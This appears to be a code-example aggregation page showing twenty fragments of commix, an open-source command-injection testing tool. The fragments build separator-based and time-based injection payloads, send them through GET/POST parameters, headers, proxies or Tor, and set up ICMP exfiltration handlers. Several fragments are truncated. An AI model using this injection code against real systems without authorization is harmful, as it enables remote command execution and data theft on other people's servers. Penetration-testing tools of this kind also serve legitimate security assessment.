• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号

Python parameters.do_GET_check函数代码示例

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

本文整理汇总了Python中src.core.requests.parameters.do_GET_check函数的典型用法代码示例。如果您正苦于以下问题:Python do_GET_check函数的具体用法?Python do_GET_check怎么用?Python do_GET_check使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。



在下文中一共展示了do_GET_check函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。

示例1: get_request

def get_request(url, http_request_method, filename, delay):

  #if not settings.COOKIE_INJECTION:
  found_url = parameters.do_GET_check(url)
  if found_url != False:

    check_parameters = []
    for i in range(0, len(found_url)):
      url = found_url[i]
      check_parameter = parameters.vuln_GET_param(url)
      check_parameters.append(check_parameter)

    header_name = ""
    checks.print_non_listed_params(check_parameters, http_request_method, header_name)

    for i in range(0, len(found_url)):
      url = found_url[i]
      check_parameter = parameters.vuln_GET_param(url)
      # Check if testable parameter(s) are provided
      if len(settings.TEST_PARAMETER) > 0:
        if check_parameter in settings.TEST_PARAMETER:
          # Check for session file 
          check_for_stored_sessions(url, http_request_method)
          injection_proccess(url, check_parameter, http_request_method, filename, delay)
      else:
        # Check for session file 
        check_for_stored_sessions(url, http_request_method)
        injection_proccess(url, check_parameter, http_request_method, filename, delay)
  
  # Enable Cookie Injection
  if menu.options.level > settings.DEFAULT_INJECTION_LEVEL and menu.options.cookie:
    settings.COOKIE_INJECTION = True
开发者ID:Cyber-Forensic,项目名称:commix,代码行数:32,代码来源:controller.py


示例2: icmp_exfiltration_handler

def icmp_exfiltration_handler(url,http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print colors.BGRED + "\n(x) Error:  You need to have root privileges to run this option.\n" + colors.RESET
    sys.exit(0)

  if http_request_method == "GET":
    url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
      opener = urllib2.build_opener(proxy)
      urllib2.install_opener(opener)
      response = urllib2.urlopen(request)
    except urllib2.HTTPError, err:
      print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
      sys.exit(1) 
开发者ID:moscaliucpaulandrei,项目名称:commix,代码行数:30,代码来源:ICMP_Exfiltration.py


示例3: injection_test

def injection_test(payload, http_request_method, url):
                      
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
        response = proxy.use_proxy(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        raise SystemExit() 

    # Check if defined Tor.
    elif menu.options.tor:
      try:
        response = tor.use_tor(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        raise SystemExit() 
开发者ID:evilrovot,项目名称:commix,代码行数:35,代码来源:fb_injector.py


示例4: injection_test

def injection_test(payload,http_request_method,url):
  		    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)

    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
	proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	opener = urllib2.build_opener(proxy)
	urllib2.install_opener(opener)
	response = urllib2.urlopen(request)
	
      except urllib2.HTTPError, err:
	print "\n(x) Error : " + str(err)
	sys.exit(1) 

    else:
      response = urllib2.urlopen(request)
      # Just to be sure
      response.read()
开发者ID:MiauWuffMiau,项目名称:commix,代码行数:35,代码来源:fb_injector.py


示例5: icmp_exfiltration_handler

def icmp_exfiltration_handler(url, http_request_method):
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + "(x) Error:  You need to have root privileges to run this option." + Style.RESET_ALL
    os._exit(0)

  if http_request_method == "GET":
    url = parameters.do_GET_check(url)
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    parameter = parameters.do_POST_check(parameter)
    request = urllib2.Request(url, parameter)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(parameter, url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      os._exit(0)
开发者ID:R3NW4,项目名称:commix,代码行数:27,代码来源:icmp_exfiltration.py


示例6: injection

def injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell):

    if alter_shell:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution_alter_shell(separator, TAG, cmd)
    else:
        # Classic decision payload (check if host is vulnerable).
        payload = cb_payloads.cmd_execution(separator, TAG, cmd)

    if separator == " ":
        payload = re.sub(" ", "%20", payload)
    else:
        payload = re.sub(" ", whitespace, payload)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
        sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
        response = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
        response = user_agent_injection_test(url, vuln_parameter, payload)

    else:
        # Check if defined method is GET (Default).
        if http_request_method == "GET":
            # Check if its not specified the 'INJECT_HERE' tag
            url = parameters.do_GET_check(url)

            target = re.sub(settings.INJECT_TAG, payload, url)
            vuln_parameter = "".join(vuln_parameter)
            request = urllib2.Request(target)

            # Check if defined extra headers.
            headers.do_check(request)

            # Check if defined any HTTP Proxy.
            if menu.options.proxy:
                try:
                    response = proxy.use_proxy(request)
                except urllib2.HTTPError, err:
                    print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
                    raise SystemExit()

            # Check if defined Tor.
            elif menu.options.tor:
                try:
                    response = tor.use_tor(request)
                except urllib2.HTTPError, err:
                    print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
                    raise SystemExit()

            else:
开发者ID:MajorD4m4ge,项目名称:commix,代码行数:60,代码来源:cb_injector.py


示例7: injection

def injection(separator,maxlen,TAG,cmd,delay,http_request_method,url,vuln_parameter,OUTPUT_TEXTFILE,alter_shell):
  if menu.options.file_write or menu.options.file_upload :
    minlen = 0
  else:
    minlen = 1
    
  print "\n(*) Retrieving the length of execution output..."
  for j in range(int(minlen),int(maxlen)):
    
    # Execute shell commands on vulnerable host.
    if not alter_shell :
      payload = tfb_payloads.cmd_execution(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)
    else:
      payload = tfb_payloads.cmd_execution_alter_shell(separator,cmd,j,OUTPUT_TEXTFILE,delay,http_request_method)

    # Check if defined "--verbose" option.
    if menu.options.verbose:
      sys.stdout.write("\n" + colors.GREY + payload.replace("\n","\\n") + colors.RESET)
      
    start = 0
    end = 0
    start = time.time()
    
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      payload = urllib.quote(payload)
      
      # Check if its not specified the 'INJECT_HERE' tag
      url = parameters.do_GET_check(url)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      
      #print target
      request = urllib2.Request(target)
  
      # Check if defined extra headers.
      headers.do_check(request)
		      
      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
	try:
	  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	  opener = urllib2.build_opener(proxy)
	  urllib2.install_opener(opener)
	  response = urllib2.urlopen(request)
	  response.read()
	except urllib2.HTTPError, err:
	  print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	  sys.exit(1) 
  
      else:
	try:
	  response = urllib2.urlopen(request)
	  response.read()
	except urllib2.HTTPError, err:
	  print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	  sys.exit(1) 
开发者ID:TheNameIsNigel,项目名称:commix,代码行数:58,代码来源:tfb_injector.py


示例8: injection

def injection(separator,TAG,cmd,prefix,suffix,whitespace,http_request_method,url,vuln_parameter):
  
  # Execute shell commands on vulnerable host.
  payload = cb_payloads.cmd_execution(separator,TAG,cmd)
  
  if separator == " " :
    payload = re.sub(" ", "%20", payload)
  else:
    payload = re.sub(" ", whitespace, payload)

  # Check if defined "--prefix" option.
  if menu.options.prefix:
    prefix = menu.options.prefix
    payload = prefix + payload
  else:
    payload = prefix + payload
    
  # Check if defined "--suffix" option.
  if menu.options.suffix:
    suffix = menu.options.suffix
    payload = payload + suffix
  else:
    payload = payload + suffix
      
  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    vuln_parameter = ''.join(vuln_parameter)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)	
      
    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
	proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	opener = urllib2.build_opener(proxy)
	urllib2.install_opener(opener)
	response = urllib2.urlopen(request)
      except urllib2.HTTPError, err:
	print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	sys.exit(1) 

    else:
      try:
	response = urllib2.urlopen(request)
	
      except urllib2.HTTPError, err:
	print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
	sys.exit(1) 
开发者ID:LZ-SecurityTeam,项目名称:commix,代码行数:58,代码来源:cb_injector.py


示例9: injection

def injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell):
  
  # Execute shell commands on vulnerable host.
  if alter_shell :
    payload = fb_payloads.cmd_execution_alter_shell(separator, cmd, OUTPUT_TEXTFILE) 
  else:
    payload = fb_payloads.cmd_execution(separator, cmd, OUTPUT_TEXTFILE) 

  # Fix prefixes / suffixes
  payload = parameters.prefixes(payload, prefix)
  payload = parameters.suffixes(payload, suffix)
      
  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + Fore.GREY + payload.replace("\n", "\\n") + Style.RESET_ALL)
  
  # Check if defined cookie with "INJECT_HERE" tag
  if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
    response = cookie_injection_test(url, vuln_parameter, payload)

  # Check if defined user-agent with "INJECT_HERE" tag
  elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
    response = user_agent_injection_test(url, vuln_parameter, payload)
    
  else:
    # Check if defined method is GET (Default).
    if http_request_method == "GET":
      # Check if its not specified the 'INJECT_HERE' tag
      url = parameters.do_GET_check(url)
      
      # Encoding non-ASCII characters payload.
      payload = urllib.quote(payload)
      
      target = re.sub(settings.INJECT_TAG, payload, url)
      vuln_parameter = ''.join(vuln_parameter)
      request = urllib2.Request(target)
      
      # Check if defined extra headers.
      headers.do_check(request)        
        
      # Check if defined any HTTP Proxy.
      if menu.options.proxy:
        try:
          response = proxy.use_proxy(request)
        except urllib2.HTTPError, err:
          print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
          raise SystemExit() 

      # Check if defined Tor.
      elif menu.options.tor:
        try:
          response = tor.use_tor(request)
        except urllib2.HTTPError, err:
          print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
          raise SystemExit() 

      else:
开发者ID:MajorD4m4ge,项目名称:commix,代码行数:57,代码来源:fb_injector.py


示例10: injection

def injection(separator, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter):
  
  # Execute shell commands on vulnerable host.
  payload = eb_payloads.cmd_execution(separator, TAG, cmd)
  payload = re.sub(" ", "%20", payload)

  # Check if defined "--prefix" option.
  if menu.options.prefix:
    prefix = menu.options.prefix
    payload = prefix + payload
  else:
    payload = prefix + payload
    
  # Check if defined "--suffix" option.
  if menu.options.suffix:
    suffix = menu.options.suffix
    payload = payload + suffix
  else:
    payload = payload + suffix
      
  # Check if defined "--verbose" option.
  if menu.options.verbose:
    sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)
    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    vuln_parameter = ''.join(vuln_parameter)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)        
      
    # Check if defined any HTTP Proxy.
    if menu.options.proxy:
      try:
        response = proxy.use_proxy(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
        raise SystemExit() 

    # Check if defined Tor.
    elif menu.options.tor:
      try:
        response = tor.use_tor(request)
      except urllib2.HTTPError, err:
        print "\n" + Back.RED + "(x) Error : " + str(err) + Style.RESET_ALL
        raise SystemExit() 
开发者ID:bupt007,项目名称:commix,代码行数:51,代码来源:eb_injector.py


示例11: icmp_exfiltration_handler

def icmp_exfiltration_handler(url,http_request_method):
  
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print colors.RED + "\n(x) Error:  You need to have root privileges to run this option.\n" + colors.RESET
    sys.exit(0)
    
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    request_data = vuln_parameter

  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
    request_data = vuln_parameter
    
  ip_data = menu.options.ip_icmp_data
  
  # Load the module ICMP_Exfiltration
  
  try:
    from src.core.modules import ICMP_Exfiltration
    
  except ImportError as e:
    print colors.RED + "(x) Error:", e
    print colors.RESET
    sys.exit(1)
    
  technique = "ICMP exfiltration technique"
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... \n" + colors.RESET)
  sys.stdout.flush()
  
  ip_src =  re.findall(r"ip_src=(.*),", ip_data)
  ip_src = ''.join(ip_src)
  
  ip_dst =  re.findall(r"ip_dst=(.*)", ip_data)
  ip_dst = ''.join(ip_dst)
  
  ICMP_Exfiltration.exploitation(ip_dst,ip_src,url,http_request_method,request_data)
开发者ID:jdalessandro,项目名称:commix,代码行数:49,代码来源:classic.py


示例12: injection_test

def injection_test(payload,http_request_method,url):
  		    
  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_GET_param(url)
    target = re.sub(settings.INJECT_TAG, payload, url)
    request = urllib2.Request(target)
    
    # Check if defined extra headers.
    headers.do_check(request)
      
  # Check if defined method is POST.
  else:
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    # Define the POST data
    data = re.sub(settings.INJECT_TAG, payload, parameter)
    request = urllib2.Request(url, data)
    
    # Check if defined extra headers.
    headers.do_check(request)
    
    # Define the vulnerable parameter
    vuln_parameter = parameters.vuln_POST_param(parameter,url)
  
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
      opener = urllib2.build_opener(proxy)
      urllib2.install_opener(opener)
      response = urllib2.urlopen(request)
    except urllib2.HTTPError, err:
      print "\n" + colors.BGRED + "(x) Error : " + str(err) + colors.RESET
      sys.exit(1) 
开发者ID:TheNameIsNigel,项目名称:commix,代码行数:43,代码来源:cb_injector.py


示例13: examine_requests

def examine_requests(payload, vuln_parameter, http_request_method, url):

  start = 0
  end = 0
  start = time.time()

  # Check if defined method is GET (Default).
  if http_request_method == "GET":
    
    payload = urllib.quote(payload)
    
    # Check if its not specified the 'INJECT_HERE' tag
    url = parameters.do_GET_check(url)
    
    target = re.sub(settings.INJECT_TAG, payload, url)
    vuln_parameter = ''.join(vuln_parameter)
    request = urllib2.Request(target)

  # Check if defined method is POST.
  else :
    parameter = menu.options.data
    parameter = urllib2.unquote(parameter)
    
    # Check if its not specified the 'INJECT_HERE' tag
    parameter = parameters.do_POST_check(parameter)
    
    data = re.sub(settings.INJECT_TAG, payload, parameter)
    data = data.replace("+","%2B")
    request = urllib2.Request(url, data)
    
  # Check if defined extra headers.
  headers.do_check(request)

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
      raise SystemExit() 
开发者ID:evilrovot,项目名称:commix,代码行数:40,代码来源:tb_injector.py


示例14: exploitation


#.........这里部分代码省略.........
			"$(python -c \"import time;time.sleep(0)\") " + seperator + " "
			"str=$(echo "+ TAG + " > " + OUTPUT_TEXTFILE + ") " + seperator + " "
			# Find the length of the output, using readline().
			"str1=$(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") " + seperator + " "
			"[ " + str(j) + " -eq ${str1} ] " + seperator + " "
			"$(python -c \"import time;time.sleep("+ str(delay) +")\") "
			)
	      if http_request_method == "POST":
		seperator = urllib.unquote(seperator)

	    elif seperator == "||" :
	      payload = (seperator + " "
			"echo '" + TAG + "' > " + OUTPUT_TEXTFILE + " | "+ 
			# Find the length of the output, using readline().
			"[ " + str(j) + " -ne $(python -c \"with open(\'" + OUTPUT_TEXTFILE + "\') as file: print len(file.readline())\") ] " + seperator + " "
			"$(python -c \"import time;time.sleep(0)\") | $(python -c \"import time;time.sleep("+ str(delay) +")\")"
			) 
	    else:
	      break
	  #-----------------------------------------------------------------------------------------  

	# Check if defined "--verbose" option.
	if menu.options.verbose:
	  if seperator == ";" or seperator == "&&" or seperator == "||":
	    sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)

	start = 0
	end = 0
	start = time.time()
	
	# Check if defined method is GET (Default).
	if http_request_method == "GET":
	  
	  # Check if its not specified the 'INJECT_HERE' tag
	  url = parameters.do_GET_check(url)
	  
	  # Encoding non-ASCII characters payload.
	  payload = urllib.quote(payload)
	  
	  # Define the vulnerable parameter
	  vuln_parameter = parameters.vuln_GET_param(url)
	    
	  target = re.sub(settings.INJECT_TAG, payload, url)
	  request = urllib2.Request(target)
	  
	  # Check if defined extra headers.
	  headers.do_check(request)
	  
	  # Check if defined any HTTP Proxy.
	  if menu.options.proxy:
	    try:
	      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	      opener = urllib2.build_opener(proxy)
	      urllib2.install_opener(opener)
	      response = urllib2.urlopen(request)
	      response.read()
	      
	    except urllib2.HTTPError, err:
	      print "\n(x) Error : " + str(err)
	      sys.exit(1) 
      
	  else:
	    response = urllib2.urlopen(request)
	    response.read()
	    
	# Check if defined method is POST.
	else:
	  
	  parameter = menu.options.data
	  parameter = urllib2.unquote(parameter)
	  
	  # Check if its not specified the 'INJECT_HERE' tag
	  parameter = parameters.do_POST_check(parameter)

	  # Define the POST data
	  data = re.sub(settings.INJECT_TAG, payload, parameter)
	  request = urllib2.Request(url, data)
	  
	  # Define the vulnerable parameter
	  vuln_parameter = parameters.vuln_POST_param(parameter,url)
	  
	  # Check if defined extra headers.
	  headers.do_check(request)
	  
	  # Check if defined any HTTP Proxy.
	  if menu.options.proxy:
	    try:
	      proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
	      opener = urllib2.build_opener(proxy)
	      urllib2.install_opener(opener)
	      response = urllib2.urlopen(request)
	      response.read()
	      
	    except urllib2.HTTPError, err:
	      print "\n(x) Error : " + str(err)
	      sys.exit(1) 
      
	  else:
	    response = urllib2.urlopen(request)
	    response.read()
开发者ID:jdalessandro,项目名称:commix,代码行数:101,代码来源:tempfile_based.py


示例15: GET

		  # Check if defined "--suffix" option.
		  if menu.options.suffix:
		    suffix = menu.options.suffix
		    payload = payload + suffix
		  else:
		    payload = payload + suffix
		      
		  # Check if defined "--verbose" option.
		  if menu.options.verbose:
		    sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
		    
		  # Check if defined method is GET (Default).
		  if http_request_method == "GET":
		    
		    # Check if its not specified the 'INJECT_HERE' tag
		    url = parameters.do_GET_check(url)
		    
		    target = re.sub(settings.INJECT_TAG, payload, url)
		    vuln_parameter = ''.join(vuln_parameter)
		    request = urllib2.Request(target)
		    
		    # Check if defined extra headers.
		    headers.do_check(request)	
		      
		    # Check if defined any HTTP Proxy.
		    if menu.options.proxy:
		      try:
			proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
			opener = urllib2.build_opener(proxy)
			urllib2.install_opener(opener)
			response = urllib2.urlopen(request)
开发者ID:jdalessandro,项目名称:commix,代码行数:31,代码来源:file_based.py


示例16: classic_exploitation_handler

def classic_exploitation_handler(url,delay,filename,http_request_method):
  
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  injection_type = "Results-based Command Injection"
  technique = "classic injection technique"
      
  sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
  sys.stdout.flush()
  
  # Print the findings to log file.
  output_file = open(filename + ".txt", "a")
  output_file.write("\n---")
  output_file.write("\n(+) Type : " + injection_type)
  output_file.write("\n(+) Technique : " + technique.title())
  output_file.close()
  
  for whitespace in settings.WHITESPACES:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
	for seperator in settings.SEPERATORS:
	  
	  # Check for bad combination of prefix and seperator
	  combination = prefix + seperator
	  if combination in settings.JUNK_COMBINATION:
	    prefix = ""

	  # Change TAG on every request to prevent false-positive resutls.
	  TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))  
	  
	  # Check if defined "--base64" option.
	  if menu.options.base64_trick == True:
	    B64_ENC_TAG = base64.b64encode(TAG)
	    B64_DEC_TRICK = settings.B64_DEC_TRICK
	  else:
	    B64_ENC_TAG = TAG
	    B64_DEC_TRICK = ""
	    
	  try:
	    payload = (seperator + 
		      "echo '" + TAG + "'" +
		      "$(echo '" + B64_ENC_TAG + "'" + B64_DEC_TRICK + ")'" + TAG + "'"
			) 
			    
	    # Check if defined "--prefix" option.
	    if menu.options.prefix:
	      prefix = menu.options.prefix
	      payload = prefix + payload
	      
	    else:
	      payload = prefix + payload
	      
	    # Check if defined "--suffix" option.
	    if menu.options.suffix:
	      suffix = menu.options.suffix
	      payload = payload + suffix
	      
	    else:
	      payload = payload + suffix

	    if seperator == " " :
	      payload = re.sub(" ", "%20", payload)
	    else:
	      payload = re.sub(" ", whitespace, payload)

	    #Check if defined "--verbose" option.
	    if menu.options.verbose:
	      sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
	    
	    # Check if defined method is GET (Default).
	    if http_request_method == "GET":
	      
	      # Check if its not specified the 'INJECT_HERE' tag
	      url = parameters.do_GET_check(url)
	      
	      # Define the vulnerable parameter
	      vuln_parameter = parameters.vuln_GET_param(url)

	      target = re.sub(settings.INJECT_TAG, payload, url)
	      request = urllib2.Request(target)

	      # Check if defined extra headers.
	      headers.do_check(request)

	      # Check if defined any HTTP Proxy.
	      if menu.options.proxy:
		try:
		  proxy= urllib2.ProxyHandler({'http': menu.options.proxy})
		  opener = urllib2.build_opener(proxy)
		  urllib2.install_opener(opener)
		  response = urllib2.urlopen(request)
		  
		except urllib2.HTTPError, err:
		  print "\n(x) Error : " + str(err)
		  sys.exit(1) 
	  
	      else:
		response = urllib2.urlopen(request)
#.........这里部分代码省略.........
开发者ID:jdalessandro,项目名称:commix,代码行数:101,代码来源:classic.py


示例17: do_check

def do_check(url, filename):

  classic_state = False
  eval_based_state = False
  time_based_state = False
  file_based_state = False

  # Check if defined "--delay" option.
  if menu.options.delay:
    delay = menu.options.delay
  else:
    delay = settings.DELAY

  # Check if authentication is needed.
  if menu.options.auth_url and menu.options.auth_data:
    # Do the authentication process.
    authentication.authentication_process()
    # Check if authentication page is the same with the next (injection) URL
    if urllib2.urlopen(url).read() == urllib2.urlopen(menu.options.auth_url).read():
      print Back.RED + settings.ERROR_SIGN + "It seems that the authentication procedure has failed." + Style.RESET_ALL
      sys.exit(0)
  elif menu.options.auth_url or menu.options.auth_data: 
    print Back.RED + settings.ERROR_SIGN + "You must specify both login panel URL and login parameters." + Style.RESET_ALL
    sys.exit(0)
  else:
    pass

  # Check if HTTP Method is GET or POST.
  header_name = ""
  if not menu.options.data:
    http_request_method = "GET"
    if not settings.COOKIE_INJECTION \
    and not settings.USER_AGENT_INJECTION \
    and not settings.REFERER_INJECTION:
      url = parameters.do_GET_check(url)
    check_parameter = parameters.vuln_GET_param(url)
    the_type = " parameter "

  else:
    http_request_method = "POST"
    parameter = menu.options.data
    parameter = parameters.do_POST_check(parameter)
    check_parameter = parameters.vuln_POST_param(parameter, url)
    the_type = " parameter " 
  
  # Load modules
  modules_handler.load_modules(url, http_request_method, filename)

  # Cookie Injection
  if settings.COOKIE_INJECTION == True:
    header_name = " Cookie"
    settings.HTTP_HEADER = header_name[1:].lower()
    check_parameter  = parameters.specify_cookie_parameter(menu.options.cookie)
    the_type = " HTTP header "
            
  # User-Agent Injection
  elif settings.USER_AGENT_INJECTION == True:
    header_name = " User-Agent"
    settings.HTTP_HEADER = header_name[1:].replace("-","").lower()
    check_parameter  = ""
    the_type = " HTTP header "

  # Referer Injection
  elif settings.REFERER_INJECTION == True:
    header_name = " Referer"
    settings.HTTP_HEADER = header_name[1:].lower()
    check_parameter  = ""
    the_type = " HTTP header "

  if len(check_parameter) > 0:
    settings.TESTABLE_PARAMETER = check_parameter

  # Check for session file 
  if not menu.options.ignore_session:
    if os.path.isfile(settings.SESSION_FILE):
      if not menu.options.tech:
          menu.options.tech = session_handler.applied_techniques(url, http_request_method)
      if session_handler.check_stored_parameter(url, http_request_method):
        settings.LOAD_SESSION = True
        
  if menu.options.flush_session:
    session_handler.flush(url)

  if len(check_parameter) != 0 :
    check_parameter = " '" + check_parameter + "'"

  print settings.INFO_SIGN + "Setting the " + "(" + http_request_method + ")" + check_parameter + header_name + the_type + "for tests."

  # Estimating the response time (in seconds)
  delay, url_time_response = requests.estimate_response_time(url, http_request_method, delay)

  # Check if it is vulnerable to classic command injection technique.
  if not menu.options.tech or "c" in menu.options.tech:
    if cb_handler.exploitation(url, delay, filename, http_request_method) != False:
      classic_state = True
  else:
    classic_state = False

  # Check if it is vulnerable to eval-based code injection technique.
  if not menu.options.tech or "e" in menu.options.tech:
#.........这里部分代码省略.........
开发者ID:jbrahy,项目名称:commix,代码行数:101,代码来源:controller.py


示例18: do_check

def do_check(url, filename):

    classic_state = False
    eval_based_state = False
    time_based_state = False
    file_based_state = False

    # Check if defined "--delay" option.
    if menu.options.delay:
        delay = menu.options.delay
    else:
        delay = settings.DELAY

    # Do authentication if needed.
    if menu.options.auth_url and menu.options.auth_data:
        authentication.auth_process()
    elif menu.options.auth_url or menu.options.auth_data:
        print Back.RED + "(x) Error: You must specify both login panel URL and login parameters.\n" + Style.RESET_ALL
        sys.exit(0)
    else:
        pass

    # Check if HTTP Method is GET or POST.
    header_name = ""
    if not menu.options.data:
        http_request_method = "GET"
        if not settings.COOKIE_INJECTION and not settings.USER_AGENT_INJECTION and not settings.REFERER_INJECTION:
            url = parameters.do_GET_check(url)
        check_parameter = parameters.vuln_GET_param(url)
        the_type = " parameter "

    else:
        http_request_method = "POST"
        parameter = menu.options.data
        parameter = parameters.do_POST_check(parameter)
        check_parameter = parameters.vuln_POST_param(parameter, url)
        the_type = " parameter "

    # Load modules
    modules_handler.load_modules(url, http_request_method, filename)

    # Cookie Injection
    if settings.COOKIE_INJECTION == True:
        header_name = " Cookie"
        check_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
        the_type = " HTTP header "

    # User-Agent Injection
    elif settings.USER_AGENT_INJECTION == True:
        header_name = " User-Agent"
        check_parameter = ""
        the_type = " HTTP header "

    # Referer Injection
    elif settings.REFERER_INJECTION == True:
        header_name = " Referer"
        check_parameter = ""
        the_type = " HTTP header "

    else:
        pass

